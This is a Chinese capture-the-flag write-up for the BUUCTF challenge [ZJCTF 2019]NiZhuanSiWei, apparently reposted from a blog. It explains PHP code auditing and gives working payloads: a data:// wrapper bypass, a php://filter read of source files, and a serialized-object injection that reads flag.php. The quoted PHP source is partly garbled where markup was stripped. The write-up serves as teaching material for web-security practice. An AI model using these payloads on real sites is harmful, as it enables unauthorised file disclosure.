BUUCTF [ZJCTF 2019]NiZhuanSiWei1
涉及知识点:
- php代码审计;
- date://text/plain协议;
- filter 协议;
- 反序列化;
- 魔术方法
打开题目链接,是直接给出的php代码。
".file_get_contents($text,'r')."
"; if(preg_match("/flag/",$file)){ echo "Not now!"; exit(); }else{ include($file); //useless.php $password = unserialize($password); echo $password; }}else{ highlight_file(__FILE__);}?> 第一个if语句要求test不为空并且text内容为welcome to the zjctf.
函数file_get_contents()解释:
file_get_contents() 函数把整个文件读入一个字符串中。
和 file() 一样,不同的是 file_get_contents() 把文件读入一个字符串。
file_get_contents() 函数是用于将文件的内容读入到一个字符串中的首选方法.
(ps:具体用法见:PHP file_get_contents() 函数)
于是便想到date://text/plain伪协议,构造payload绕过第一个if:
使用格式:data://text/plain,[code]
eg: data://text/plain,base64,[code]
http://522341e8-4fc1-4d56-822d-01a0962a4569.node4.buuoj.cn:81/?text=data://text/plain,welcome%20to%20the%20zjctf重新发送后:显示如图所示:
到此,第一个if绕过成功;
在第二个if语句中发现有提示useless .php文件,便想到使用伪协议filter读取文件内容,
php://filter
用法:格式为php://filter/[write] or [read]=[过滤器]/[resource]=[文件路径]
构造第二个payload,读取php文件中的内容:
file=php://filter/read=convert.base64-encode/resource=useless.php重新发送以后,显示如图所示:
将所得到的内容进行base64解码得到如下php代码:
file)){ echo file_get_contents($this->file); echo "
"; return ("U R SO CLOSE !///COME ON PLZ"); } } } ?> 分析代码
可知flag应该存在于flag.php文件中;
__toString()是快速获取对象的字符串信息的便捷方式,似乎魔术方法都有一个“自动“的特性,如自动获取,自动打印等,__toString()也不例外,它是在直接输出对象引用时自动调用的方法。
__toString()的作用
当我们调试程序时,需要知道是否得出正确的数据。比如打印一个对象时,看看这个对象都有哪些属性,其值是什么,如果类定义了toString方法,就能在测试时,echo打印对象体,对象就会自动调用它所属类定义的toString方法,格式化输出这个对象所包含的数据。
(ps __toString() 函数详解见:php反序列化及__toString() - 镱鍚 - 博客园)
第二个if语句中有一个反序列化:unserialize()函数:unserialize() 函数用于将通过 serialize() 函数序列化后的对象或数组进行反序列化,并返回原始的对象结构。可写出序列化代码:
(ps:具体用法见:PHP unserialize() 函数 | 菜鸟教程)
运行后可得到;
则可再一次进行构造完整payload:
?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";} 即可显示:
最后在查看网页源代码,即可发现flag。
来源地址:https://blog.csdn.net/biggerpig/article/details/127033961
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
